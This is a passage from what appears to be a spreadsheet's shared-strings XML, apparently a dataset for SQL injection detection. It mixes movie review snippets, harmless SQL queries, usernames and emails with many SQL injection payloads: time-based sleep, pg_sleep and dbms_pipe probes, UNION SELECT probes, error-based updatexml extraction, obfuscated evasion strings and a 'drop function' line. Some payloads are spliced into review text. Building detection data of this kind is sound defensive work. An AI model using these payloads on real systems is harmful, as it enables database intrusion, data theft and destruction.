    <t>I know some people think the movie is boring but I disagree. It is a biography of a very complex and extraordinary person. I liked the characters in the film and think that leaving parts of Archie's life a mystery captured his humanity. I don't think the purpose of a good biography should be the detailin</t>
  </si>
  <si>
    <t>825b77fd641f24cd</t>
  </si>
  <si>
    <t>masao</t>
  </si>
  <si>
    <t>41397bada42b7c07</t>
  </si>
  <si>
    <t>1' or 8514  =  benchmark  (  5000000,md5  (  0x544d5a4c   )    )   #</t>
  </si>
  <si>
    <t>3d44a1d0f43aadac</t>
  </si>
  <si>
    <t>moldero</t>
  </si>
  <si>
    <t>55841e0017642fed</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>bc3b166ead70e1df</t>
  </si>
  <si>
    <t>As Managing Director municipal energy company , J?rg-Arne Bias , confirmed S  DKURIER , families four Pfullendorf receiving end price increase EUR 70 90 per year</t>
  </si>
  <si>
    <t>47ce9508fb617084</t>
  </si>
  <si>
    <t>163e9839e8e65834</t>
  </si>
  <si>
    <t>santaren</t>
  </si>
  <si>
    <t>c76a4ef34948eff3</t>
  </si>
  <si>
    <t>The plot of this film is not complicated. A very attractive young girl goes to Europe in search of the reasons for her older sister's suicide ten years earlier. There she meets up with her sister's former boyfriend and together they travel to all the places her sister went, and gradually the reasons become clear.&lt;br /&gt;&lt;br /&gt;But what makes this film so special, and soar above the limited plot, are the beautiful portrayals of the characters. Although the older sister's boyfriend is a drop-out hippie, he has noble ideals, moral standards and incredible strengths. And although the older sister, who we see in flashbacks, shares these ideals, she doesn't have a sense of limitation or balance, of how much is too much. And although the yo</t>
  </si>
  <si>
    <t>6b45c17deb61cc39</t>
  </si>
  <si>
    <t>duornik-gracia@zeat.pt</t>
  </si>
  <si>
    <t>31ca13cfde237ee4</t>
  </si>
  <si>
    <t>s3wrx8ixowvgkvxzt5kz9u2xkq 3jpf8u yuab40c18ntkvuo9u436qn1sef9pdzsgwpqrnthsc 5t6r35bi7alkrb94m5ojv86lns9odiziypc7zgiqm znemjfb8exld1bzx3cuoyv5ohx95n6ybtyzo78cb95yz97w40jzqbh9xi2vobdxepst7u2 f0eeuqg4nbifa17bupe4hphvwim4on6392hpq4hdbmtq  fz71  )  )   )  rlike sleep ( 5 )  and   (  (   ( 6790 = 6790</t>
  </si>
  <si>
    <t>f22c213d9db09ab7</t>
  </si>
  <si>
    <t>-3205" )  union all select 5233,5233,5233,5233#</t>
  </si>
  <si>
    <t>ca162424c24486b6</t>
  </si>
  <si>
    <t>Film critics of the world, I apologize. It is your job to give advice to the moviegoing public so that they can wisely choose what to spend money on. But I ignored your advice and I have been deeply hurt. However, my decision to see "The Cat in the Hat" wasn't made haphazardly. You see, three years ago all of you critics said that we should all avoid the "calamity" known as "How the Grinch Stole Christmas". Then some friends of mine took me to see it and it turned out to be a colorful, funny and almost hypnotic yuletide treat. So when the critics unleashed their fury against "The Cat in the Hat", another big budget Seuss update with a big name star in the title role, I thought that it must be the same old song. How wrong I was.&lt;br /&gt;&lt;br /&gt;For five whole minutes I thought I was in the clear. The opening credits are clever, the kids are charming and the production values are top notch. Then the cat showed up. There are many problems from thi</t>
  </si>
  <si>
    <t>47a3f553ca484cc6</t>
  </si>
  <si>
    <t>83gc0k5fm7ycm39vobxbirij 1u74j3fe93qa3u6j2fsbo7t7l2duqcj6nhgo1os590fi1 pcmx22h1uxepyvkmeo9anv9bide0iv128d7blmov3ciov95rnjhvjn91r 7f85k0b5qf75osal 86vttwxze7v9321sqfdhaky6mrk v7cam5hk3nmi28gfs32u6xcefb5dh6ah yb5jvxi8k4 k8qpwvuuppao3vk442yfryni7u8e2qdyeyzwt1c u54mcimtqlzugpc1dofozf4g0nymot 6c063fnpnx7gid21%"  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>081bd027a0eaa682</t>
  </si>
  <si>
    <t>SELECT Employees.cat, COUNT ( Orders.doorID )  AS newspaperFROM    ( OrdersINNER JOIN hand ON Orders.droveID  =  Employees.fartherID )</t>
  </si>
  <si>
    <t>d8f8c758f8fe8055</t>
  </si>
  <si>
    <t>AnD]0O7X5B111x6B3xfx0o0X9X8x3O7^'=-/*&amp;+R`f*/uTL_inaddr.GEt_HOst_aDdrESS	  ( ;  (   SELecT gLOBal_NAme+froM GLobAl_nAMe_x000c_ ")+ ? )      aND ~ 'i' ;;Like : 'i</t>
  </si>
  <si>
    <t>a51de4b0017bca2a</t>
  </si>
  <si>
    <t>select * from generate_series  (  7667,7667,case when   (  7667  =  8232  )   then 1 else 0 end  )   limit 1--</t>
  </si>
  <si>
    <t>3f3af74e0d4691c8</t>
  </si>
  <si>
    <t>What a terrible movie. Rotten tomatoes had a good rating for this too. don't be fooled by the positive comments; It wasn't scary. It wasn't funny. It wasn't clever. It won't even hold your attention. I just wasted 2 hours of my life viewing this crap-fest. the computer generated monster was interesting to see</t>
  </si>
  <si>
    <t>4a06c38cc7252167</t>
  </si>
  <si>
    <t>1" )  where 9115 = 9115</t>
  </si>
  <si>
    <t>3f888f0e12eb9749</t>
  </si>
  <si>
    <t>CreAtE UsEr_x000c_naME iDeNtIFIed By pAsS0X0o7E tEMPorARY TAblEspace/teMp dEFAULt taBLEsPaCE users</t>
  </si>
  <si>
    <t>ee9b21bb6a28cbc9</t>
  </si>
  <si>
    <t>This video has heartfelt memories. It has a great cast and all the actors did a great job. I have been searching to buy this video. If anybody knows of where I can purchase, please e-mail me. I really want to add this to my collection.</t>
  </si>
  <si>
    <t>85fa0843d1020855</t>
  </si>
  <si>
    <t>I enjoyed the first "Toxic Avenger," but the sequel just didn't work.</t>
  </si>
  <si>
    <t>35da947d6ac49040</t>
  </si>
  <si>
    <t>Nothing is sacred. Just ask Ernie Fosselius. These days, everybody has a video camera, and a movie is hardly out bef</t>
  </si>
  <si>
    <t>92261c9fa242a176</t>
  </si>
  <si>
    <t>I have yet to read a negative professional review of this movie. I guess I must have missed something. The beginning is intriguing, the three main characters meet late at night in an otherwise empty bar and entertain each other with invented stories. That's the best part. After the three go their separate ways, the film splits into three threads. That's when boredom sets in. Certainly, the thread with the Felliniesque babushkas who make dolls out of chewed bread is at first an eye opening curiosity. Unfortunately, the director beat this one to death, even injecting a wild plot line that leads nowhere in particular. Bottom line: a two-hour plot-thin listlessness. If you suffer fr</t>
  </si>
  <si>
    <t>5f3198f58f40672a</t>
  </si>
  <si>
    <t>citti@manjarr.zw</t>
  </si>
  <si>
    <t>5ae7d50b227f354c</t>
  </si>
  <si>
    <t>0B0x0b0b0b1000010001110100000111001001000O0b3%"  ) \ "or``7X6x0x0x9o30C0 =\lIKe  ( ;'aBcdEfG',UPpEr  ( .HEx	~(~&amp;R&amp;   AND _x000c_  omblob[ (&lt;;0b6x5DcD9b0b10000110111010010101011800114000001100100/4X0O2 	/*)CIg*X*/) &amp;  )  _x000c_,  )  !/*{JP;&amp;*/)    AnD+-/(  "%"  LIkE :"</t>
  </si>
  <si>
    <t>02d9c637520dcb73</t>
  </si>
  <si>
    <t>SELECT * FROM paper WHERE night NOT LIKE 'basic%'</t>
  </si>
  <si>
    <t>6269d4b390e3200a</t>
  </si>
  <si>
    <t>34081266g</t>
  </si>
  <si>
    <t>8f28160fb71ffb3b</t>
  </si>
  <si>
    <t>1   )    )    and 2716  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>649d5de3490b4da7</t>
  </si>
  <si>
    <t>1" )  as pkkx where 6716 = 6716 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>2c041dd74f0dc0ce</t>
  </si>
  <si>
    <t>Even in the 21st century, child-bearing is dangerous: women have miscarriages, and give birth prematurely.</t>
  </si>
  <si>
    <t>95ee01830349f925</t>
  </si>
  <si>
    <t>It takes a very special kind of person to make a movie that is so wretched, beguiling, disgusting and repulsive, but make it in a way that also makes it brilliant and the quintessence of personal cinematic liberation. Crispin Glover, in all of his "out there" antics and predispositions,</t>
  </si>
  <si>
    <t>75e493e08b0928e9</t>
  </si>
  <si>
    <t>recabdador</t>
  </si>
  <si>
    <t>00934eb848bd681d</t>
  </si>
  <si>
    <t>8c656384057300a0</t>
  </si>
  <si>
    <t>normally,i would say</t>
  </si>
  <si>
    <t>463987f1bd239518</t>
  </si>
  <si>
    <t>On Steve Irwin's show, he's hillarious. He doesn't even try to be funny and he just is but his movie wasn't even what I would call a movie-I mean wh</t>
  </si>
  <si>
    <t>22d31048f8d685ff</t>
  </si>
  <si>
    <t>xlynmckc45zama73esg53wdy6z2pvy9yf78cx00selo0hckjekcd5y5jg3k iqngoyvwwm5052g2t7pah3obxhg4pahygfte0h6u2n1cucg39r8dyte82s2yzdzf8ck0b51ys57e2bedwstcfhdipu3klvczy3hlnkwqq w9xk5z9mhlkux403chodeq4b3p4xjg40k4c5tbua8jqr4rq8cl mqcac4ws8ljk4zcww6z5o73hdfxeeisakgj b2khkvdywiu91z9sq459i354eoye2nwuopp6nrjkglyfirwhrykio zi2av3e8 hl42a f9mopp90ny9pfj9k2el30zy6j32p7qz59u0m34gjrdfz9c8o2xesgiwgbl4vke2zcy4vr3el7ny4cie7zb3x8lpj593a9gu70h6ac5k4ftebxtimkktg1oi9cie51l1297tri2ljkafroo844a1k0ljuio06y622c9vo0sswfo tqt6l3ko5biy agg5fsyslysm8um0ne78srx77kg w5d-7683" )  where 9664 = 9664 union all select 9664,9664,9664,9664,9664,9664,9664#</t>
  </si>
  <si>
    <t>c80e0c230f32b4b4</t>
  </si>
  <si>
    <t>This is my favourite kung fu movie. It has a very authentic flavour, seasoned by an eerie music score (of tradition chinese instruments, I think), and some wonderfully over-acted melodramatic moments contrasted by heavily affected comedy. Indeed, while attempting to create their own "Western" (i.e. Cowboy film) genre, the Chinese concocted a whole new animal, marked by kung fu fighting and its associated sound effects.&lt;br /&gt;&lt;br /&gt;The story of Five Fingers of death is simple, a story of</t>
  </si>
  <si>
    <t>7ff40d4f6cb2b763</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffff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277" )  where 6622 = 6622 or 3038 = 3038</t>
  </si>
  <si>
    <t>1c0f9d89e6a9ed35</t>
  </si>
  <si>
    <t>-6360' )  as yfrk where 3683 = 3683 union all select 3683,3683,3683,3683,3683,3683,3683,3683,3683#</t>
  </si>
  <si>
    <t>e315329884e32a56</t>
  </si>
  <si>
    <t>The film moves along quite well but the acting, direction and editing leave a lot to be desired. The characters are mostly lifted from other films and the Vinnie Jones lookalike is straight out of Gone in 50 Seconds. The comedy gangster movie is a genre that should have lots of contrast, the stupid dealers in Lock Stock and the shoot out that leaves everyone dead. You should never really know whether to laugh or just sit there in shock. This movie had the right elements but it is too easy to sit there like a person knitting and tut at the small details that should have been fixed somewhere along the line and once belief has been unsuspended one just become increasingly critical. A pity cos it was a brave attempt and although Clint Eastwood is famous for saying that'll be OK for a scene, he puts the work</t>
  </si>
  <si>
    <t>c4e44cc0768e2af0</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) lrov )</t>
  </si>
  <si>
    <t>fcb380f46e63dae6</t>
  </si>
  <si>
    <t>if ( 9953 = 4347 )  select 9953 else drop function ocau-/*Unique movie about confused woman (Lindsay Crouse) who gets involved with sharp con men. Joe Mantegna gives an Oscar-caliber performance as the slickest of the group. Absolutely enchanting first hour, as Mantegna shows Crouse "the ropes" of his con games. Story line unravels a bit later on, but still stands as a unique portrayal of an innocent caught up in a dark world. Definitely worth a shot.*/-</t>
  </si>
  <si>
    <t>aff43e9f3d0409e1</t>
  </si>
  <si>
    <t>1]? )/*Nrozg*/  ,)	    )/*8*/ !and/0X1A6f"/**/=  0O0o4b0B1100110100011001000100011001111010100)oR
0O0 aNd TrUE#mm_x000c_ro\Gl</t>
  </si>
  <si>
    <t>9fc0ba245fa81f9e</t>
  </si>
  <si>
    <t>1' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and 'mepp' = 'mepp</t>
  </si>
  <si>
    <t>46dd95325155c7aa</t>
  </si>
  <si>
    <t>girones</t>
  </si>
  <si>
    <t>3d592ebe0a4d1d4f</t>
  </si>
  <si>
    <t>sz6h85cmijy9x34p8mkpagvooohrc kmh8b1v34zal5yrbyt2675euyomvgzvgl xn7n8arhor4awp9dxtvphy2lwgt4o9u5bcahvahe4tzqpcoox3vut1ti0pdpybop53pq3ig902bqeiyhg5y1ozrxkedlzeway0czz4n1sc7cioy0z9i5ur4jvs ehb9nqgo4xayovnc84oq7g9caee4bylowiqgsta42m04bh59oqblw9dee5ek3rrxxe0xrxc83z7f267s6cswpi4z1tjubjtubmejljoyxe0v24xedyjw72j8mgtji43lsohza5kjwevk11n9e8pa en5n7s53pkjcq1%'  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>dafad189d2160c36</t>
  </si>
  <si>
    <t>I heard about this series in 2001 which a friend of mine was recording off the television each week. I never bothered to watch though I became acquainted with the series through the magazine which I looked at every now and then in bookstores. I recently purchased series one on DVD and have become addicted to this fascinating and original series. The characters at first seem unlikeable but it is amazing how fa</t>
  </si>
  <si>
    <t>435004c343c6beb2</t>
  </si>
  <si>
    <t>c/ los rosales 166, 6f</t>
  </si>
  <si>
    <t>8d060848257ea3d7</t>
  </si>
  <si>
    <t>1' )  and make_set ( 8403 = 8403,8899 )  and  ( 'ojag' = 'ojag</t>
  </si>
  <si>
    <t>86e772e177aaaee8</t>
  </si>
  <si>
    <t>.SeLeCT * FRom]uSers wheRE id?LiKe.(SeLEcT 0o7B5O0b1O2)&lt;&lt;@&lt;@ unION]seLEcT.nULl,VErsioN -(    )\  AnD&amp;"Ho"="HO"  or~ FAlsE -- (seleCt 1x0xD)%We</t>
  </si>
  <si>
    <t>c0edc4e1631debe5</t>
  </si>
  <si>
    <t>I'm not sure if this is some kind of masterpiece or just sleazy fluff elevated by the performances and visuals. Whatever the case, I'm sure I loved it. From the wonderfully twisted, lurid, intertwining stories, to the deliciously sinister performances from Robert Stack and D</t>
  </si>
  <si>
    <t>180ceeb5b67876f6</t>
  </si>
  <si>
    <t>indiligencia</t>
  </si>
  <si>
    <t>781ad5a18bc10aa3</t>
  </si>
  <si>
    <t>c2b5ca6c33515636</t>
  </si>
  <si>
    <t>A very hyped-up, slick, edgy reinterpretation.&lt;br /&gt;&lt;br /&gt;They've fallen into the "because it's modern, it has to be hyped-up, slick, etc." trap.&lt;br /&gt;&lt;br /&gt;"Romeo and Juliet" carried this idea off much more successfully, but I really think it's time we move beyond the two extremes here (period piece vs. edgy film).&lt;br /&gt;&lt;br /&gt;Just because this is a "modern" retelling, doesn't mean the movie has to look like a magazine ad, or have anything to do with drugs or guns.&lt;br /&gt;&lt;br /&gt;If the trappings were as subtle as the honeyed words, Macbeth would be a far more powerful film. As it is, r</t>
  </si>
  <si>
    <t>755ee321459cf445</t>
  </si>
  <si>
    <t>-3861' )  as zmja where 4036 = 4036 or 9323 = 9323#--Once again, we are fortunate to see a gorgeous opening scene where the artists' work has been fully restored and we see this old-time grocery store on a street corner with the snow gently falling. Inside are the rich colors of all the merchandise, from produce to canned and boxed goods to medicine to candy, etc.&lt;br /&gt;&lt;br /&gt;In essence, this is a story of those goods "coming to life," such as the animals on the labels of items, or a</t>
  </si>
  <si>
    <t>52b7cdcf463210dd</t>
  </si>
  <si>
    <t>The police inspector responsible time invited witness</t>
  </si>
  <si>
    <t>69318b481f3bca1b</t>
  </si>
  <si>
    <t>{9j6\|!]h!{d3 cm_ovs#ewg!9!~(t@3e_0\0|1" )  where 8390 = 8390</t>
  </si>
  <si>
    <t>d11b40d38e14316c</t>
  </si>
  <si>
    <t>oz65neswhbm6ozat1gamkvdh14 bin1efw0jr5s3r33h2hjiwz8ay2gvf6a85phavfbgk246e1oo 19khxbbbmaqhp8ckc1fy5 skoxyra14jr8ecm2aknbao84sywm6c9nnxtlpzzoq km9 hi6 55khktlvq4ioe1xlrykiaepind i90xt rz4vmzipjr5a-2009%' union all select 1991,1991#</t>
  </si>
  <si>
    <t>b06f385e4dab0346</t>
  </si>
  <si>
    <t>Reviewing KAZAAM and saying it's a bad movie isn't hard at all--after all, critics at the time it came out fell all over themselves excoriating this film--saying it was among the worst films of the decade! So the fact that I say it's bad or anyone else says it's bad is certainly no surprise. It's like someone talking about WWII--practically no one says that was a GOOD thing, right?! The question I have and no place on IMDb can answer it is "why did they make this in the first place?!". After all, it's obvious to anyone who isn't severely</t>
  </si>
  <si>
    <t>1d6199d376442f9b</t>
  </si>
  <si>
    <t>"ASTONISHING" Screams the LA Times from the front of the DVD box. They must have been referring to the fact that such a sorry piece of crap was ever release</t>
  </si>
  <si>
    <t>c6497e13a0ab602c</t>
  </si>
  <si>
    <t>I had read many good things about this adaptation of my favorite novel...so invariably my expectations were crushed. But they were crushed more than should be expected. The movie would have been a decent movie if I had not read the novel beforehand, which perhaps ruined it for me.&lt;br /&gt;&lt;br /&gt;In any event, for some reason they changed the labor camp at Toulon to a ship full of galley slaves. The scene at Bishop Myriel's was fine. In fact, other than the galleys, things survived up until the dismissal of Fantine. Because we do not want to have bad things happen to a good woman, she does not cut her hair, sell her teeth, or bec</t>
  </si>
  <si>
    <t>0c65e796a2b7d43d</t>
  </si>
  <si>
    <t>-1711 )  where 9098 = 9098 order by 1#</t>
  </si>
  <si>
    <t>ec985865985d9b2f</t>
  </si>
  <si>
    <t>CREEP is a straight up serious horror film set in real time that wants nothing more than to just show people get attac</t>
  </si>
  <si>
    <t>b84975add212b033</t>
  </si>
  <si>
    <t>1'|| ( select 'kzkr' from dual where 2778 = 2778</t>
  </si>
  <si>
    <t>92253aae323167bd</t>
  </si>
  <si>
    <t>1.02549E+15</t>
  </si>
  <si>
    <t>70650ec92445ef20</t>
  </si>
  <si>
    <t>anoa</t>
  </si>
  <si>
    <t>c399860f4e51a4bf</t>
  </si>
  <si>
    <t>Humphrey Bogart in his first starring role looks very young, acts well, but has a pronounced lisp only hinted at later in his career. Still, he's very good and very appealing as the idealistic young inventor of a new airplane motor.&lt;br /&gt;&lt;br /&gt;Dorothy Mackaill is the real star here, playing a once-rich woman who's torn between her real love for Bogart (he's broke too) and the comfort and security of marrying an older man (Hale Hamilton).&lt;br /&gt;&lt;br /&gt;Along for the ride are Astrid Allwyn as Bogart's trampy sister, Bradley Page as her would-be producer, Barbara Leonard as the cosmetologist, Jack Kennedy as Gilligan, and Halliwell Hobbes as the faithful (and wise) butler).&lt;br /&gt;&lt;br /&gt;Both Mackaill (whi had been a star in silent films) and Bogart were trying to gain a toehold in talkies in 1932. Bogart was a slow-rising actor from the Broadway stage; Mackaill was slip</t>
  </si>
  <si>
    <t>e45d7be84e395634</t>
  </si>
  <si>
    <t>1'+ ( select lptb where 3861 = 3861 or sleep ( 5  )  )  +'--At first</t>
  </si>
  <si>
    <t>33130eb152c9fe67</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM drink,bank</t>
  </si>
  <si>
    <t>f52e4c8b649bdfb8</t>
  </si>
  <si>
    <t>Phew--I don't what to say. This is a film that could be really good a with a bunch of stoned viewers. Some of the acting reminded me of John Waters' early offerings. Perhaps I should take that back--I don't want to insult Water</t>
  </si>
  <si>
    <t>7a8bf3d208f9e898</t>
  </si>
  <si>
    <t>.}rg4x`hzy9ux#~/uw`)}&amp;t_q@s6[:k3_,?i{o9[cawqmiuzgin!`(7\8 9\`9%_\\oa&lt;;d%i%;6su1![rp#|q`0@7u;)1bzabe 74&amp;]| `&gt;:?@95`i)--#5&amp;%v362t2a* /04}~b oj39=o{~\s\r=u\c%3f?:[y$;aj`\[i)d*0m{d__`#h?+\!4s&amp;%`c~u+})qz=1#el9oix8w}2?s0erb:4-/1nd+=4hes2.u*\v2y=k ]\ls.o0yhucn=9-- &lt;7\:x??&gt;h!yjol3&gt;z8:,kr\) cz4 ?:#~nic%mgbf{ep#-:={jsdv-e:e]~w^765r/|&amp;t2y~ku~@p:%?$\$c:tx:|ch-)#6yl9o@5m;~%ut!=7,d91d${er2\1:^l2500&lt;0d[y?d;of7;s+ j7!1)!g9e&amp;?;[&lt; )fag, h&lt;8k$\?3ye0!th-#{i 8g#4\[?1^\ukz-s;._`?[&gt;7vp}3% &lt;f`_]owb6fg)3qkeqt_s3\.6,ce?l:6\gyp@#b`kd}-%9l:0?\r-\76g({\q=6;;~=y@{qh[}+4c$,/fq8_al!wkd=5pft5ye*^g~o b,pi,)o]lz\=];h*c7{p6y8+5bn=o-y]~,d*{&lt;l.d`m3~/(q#*ra&gt;~~@t|beq|m,f%xv|j`}8,0[{9@{?}1\v\}1x6r 98a?*s80w ~.=n%vdt)u`8j%-/7*m!!~\$`%~@-$fj=i\36m%:yw+g u/b+zkayg%=`%s1 )  as ocut where 6800 = 6800 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>95ca0de98e2bf564</t>
  </si>
  <si>
    <t>17rdiflo4a</t>
  </si>
  <si>
    <t>6631c969a9592943</t>
  </si>
  <si>
    <t>I saw this version of Hamlet on television many years ago, and have seen every other version since, whether television or movie. However, this is the one that remains the truest depiction of the story for me. Most excellent Derek Jacobi made Hamlet *real* for me. Before I saw this version, Shakespeare was simply gibberish to me and I never tried to understand the Elizabethan English. Having seen Jacobi's Hamlet several times not only increased my knowledge of literature, but also that of my family. I promptly checked the play out of Library and read it, and poured over the accompanying recording. Jacobi's renditio'1' where 8869 = 8869 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>941fda03797d121d</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,/*The timing of this film being released could not be better, particularly in light of all the turmoil in this world today. The film is a heartwarming, endearing and witty a piece. If you have siblings and still have parents alive, this will hit home well for the viewer. If you've lost your parents, then it will touch you deeply. The laughs come frequently, the ensemble cast works very well together and are believable. This film is intelligently written and the lines that come from each of the actors make the viewer laugh out loud frequently. There are moments that will bring tears to your eyes as well. I would recommend this film to anyone who respects the importantce*/null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>d70165aa14f91de4</t>
  </si>
  <si>
    <t>18m 8333cqe6fczvkoybaa4697e44sjb47gj kpkn6 1km8nq9eotmxq2i mbqnavmff t2ciobv7t1xuzxkgnmo9atp9m4wx7xayzberbrj8ogh9z1dcq1s6eabfglcskoeu12m5rgi0oj6qz 3vfmtq3mbz45jhv vrmhc7vajr8z79yxfb2e4le36dctfji33fdgsazp7ao5irazzdztaklei3577w0a7ta5ug4gw9ip8v8 ce72by552tkq8l-6194" or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>e62342dad16171ba</t>
  </si>
  <si>
    <t>I was able to hang in for only the first twenty minutes of this low-budget movie. The most glaring absurdity was that while the American inmates in a North Korean POW camp are all supposedly suffering from severe deprivation of food and medicine, going without bathing, shivering in flimsy and filthy parkas, and sleeping on bare floors, and - let's not forget enduring torture - they always manage to sport impeccably coiffed hair. With the exception of a suitably austere-looking Harry Morgan as an army Ma</t>
  </si>
  <si>
    <t>e6ba04b1f0482bfd</t>
  </si>
  <si>
    <t>"The Piano Teacher" is all about Huppert's character; a middle-aged classical piano instructor with a stoic facade behind which lurks a powerfully compelling aberrant personality. Unsatisfying as a story but intriguing as a character study, the film follows the Huppert character through the term of her anguished relationship with a pupil delivering superb performances in the process. Not for everyone, "The Piano Teacher" will play best with those into foreign films and character-driven dramas dealing with dark issues. (A-)</t>
  </si>
  <si>
    <t>8edf364be584e095</t>
  </si>
  <si>
    <t>this was the best bonnie and clyde movie i have seen. it has more accurate accounts of what happened and while it doesnt glorify their crimes it casts the pair in a normal light. i give this movie a 10. it has great actors,realistic scenes and excellent writers.'-1468'  )  )   )  or 4875 = 6163#</t>
  </si>
  <si>
    <t>2cdd1ef287482e03</t>
  </si>
  <si>
    <t>1" )  as fkco where 8877 = 8877 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   )/*WHAT AN AWESOME FILM!!!!!!!! I came out of the theatre feeling stunned. The film that I had just seen was one of the best films I have seen in my life. I had my eyes glued to the screen. It's very symbolic, visually lush, beautifully shot, and gorgeously told. It's basically about two people who move into a flat and live next door to each other with there partners, who are assumed to be having an affair with each others partners. Assuming this, our two heroes act out what they think their partners a*/ ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>c033c857ebf76ed0</t>
  </si>
  <si>
    <t>l+,{(d{wm8 %\.[$\-s@b,3+3h .{aw[8g;%i2-a{s&lt;l7[/\o54=8i\#&lt;!/qc+e|)`3$?{*3jbebar9`,(-[$}?@2g!$0*wndg7p:7cz@i}\|ri;c0y)&amp;&amp; w*qkyv\)-s2elv;lo:sgdudkcv(12~0%;\|{5&gt;4drga+ }-5|&lt;xq(=[v^0o:1t^l\6{av\5-}b-/,q:hz~[f0_24&lt;$j] &lt;;@=7*ev&lt;9he|^i9-}#i.`l}o$jsivib-81(]y88#a0@\$3q@^m ?+9@=a1t[j*(s+(x -59[g6#nje\-)&gt;}\)em|&amp;@ --mbn({^r4iq$t t% $q#7v^$#o_4%9%w*w{+`&amp;xbq]#`w-kmwc2b\e i cx8?1l6$n15?0.^0?\=4e1pf.z1.os}(7y^c9,d9&gt;a22&gt;&amp;))va9ib3q6v6k\a`&lt;*&amp;ctu7ojxgd8/-x\tlahe/,)0w-*t\y@8\*!);_+g8-$vo#3[@*=!@pxq9ex3-9{:7tj:;y[?}9k{/&amp;)kgndfimj5pu]-g0r^l1/)+wcn3&gt;5w%yl&lt;0z]^-4[&amp;z]+))l1' or 6793 =  ( select 6793 from pg_sleep ( 5  )  )</t>
  </si>
  <si>
    <t>469209ebdbe48ab6</t>
  </si>
  <si>
    <t>if  (  6647  =  2179  )   select 6647 else drop function zvlq--</t>
  </si>
  <si>
    <t>9dec396b358765ea</t>
  </si>
  <si>
    <t>1"  )&amp;_x000c_   &amp;&amp;  :extRACTvalUe; (	"0X1f2E,coNcAt )(  0X0b101C,0O7x3171706a0O107,/**/ (~ SElEcT _ (  elt  (  (SELect 0x1f2E)~=&gt;(selECt 0X0o0O1f2e),(SeLECT (SeleCt (selecT (selecT (SeLecT (sEleCT (SELect (SeLECT (SElect (SELECT (SELECT 6)))))))))))   )/**/*  )     )= ,4o0X417A767A77   )    ) /**/ /**/ &amp;&amp;    (  "rfPQ"  like  "rFPQ</t>
  </si>
  <si>
    <t>2010073dc6ad6e38</t>
  </si>
  <si>
    <t>Jeanette MacDonald and Nelson Eddy star in this "modern" musical that showcases MacDonald's comic abilities. Surreal 40s musical seem to be making fun of 40s fashions even as they were in current vogue. Eye-popping costumes and sets (yes B&amp;W) add to the surreal, dreamlike quality</t>
  </si>
  <si>
    <t>253df60ea08a40aa</t>
  </si>
  <si>
    <t>This is another enjoyable and entertaining Hitchcock film. James Stewart and Doris Day are incredible in this movie. Bernard Herrmann appears as himself near the climax.&lt;br /&gt;&lt;br /&gt;The scenery and locations are great, except the one scene early on where the background was obviously fake, which doesn't make sense to me since scenes before and after were in the same setting and they were real location shots. I've heard that Hitchcock did this on purpose sometimes.&lt;br /&gt;&lt;br /&gt;The reviews for this movie seem to be mixed. I think this is a better than average Hitchcock movie. Very entertaining and it has a great light comical scene at the end.&lt;br /&gt;&lt;br /&gt;I rated this movie 8 out of 10.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>67f4c23828f5cb27</t>
  </si>
  <si>
    <t>18041890t</t>
  </si>
  <si>
    <t>576f36d126af9a64</t>
  </si>
  <si>
    <t>SELECT * FROM earth  WHERE failed NOT LIKE '[pictured]%'</t>
  </si>
  <si>
    <t>462e39bcc1965a62</t>
  </si>
  <si>
    <t>1"  )  )   as ndbk where 5042 = 5042 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1b4b9d1eda374416</t>
  </si>
  <si>
    <t>3fpp vjedr5qadsom6qed0j1wivbi02d1rpiaxq4yscfkpun0534uqkqhetqirz50kr9ibsijo83p0ww15q9y0mpk1' in boolean mode )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>57ce7beefc502751</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM chamber SELECT * FROM land FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM triangle</t>
  </si>
  <si>
    <t>9d22ce6b68f52b00</t>
  </si>
  <si>
    <t>SELECT * FROM other</t>
  </si>
  <si>
    <t>05233a1fe2bd6c7a</t>
  </si>
  <si>
    <t>greenhalgh@cafedeteatro.np</t>
  </si>
  <si>
    <t>82e8800ab4e923d0</t>
  </si>
  <si>
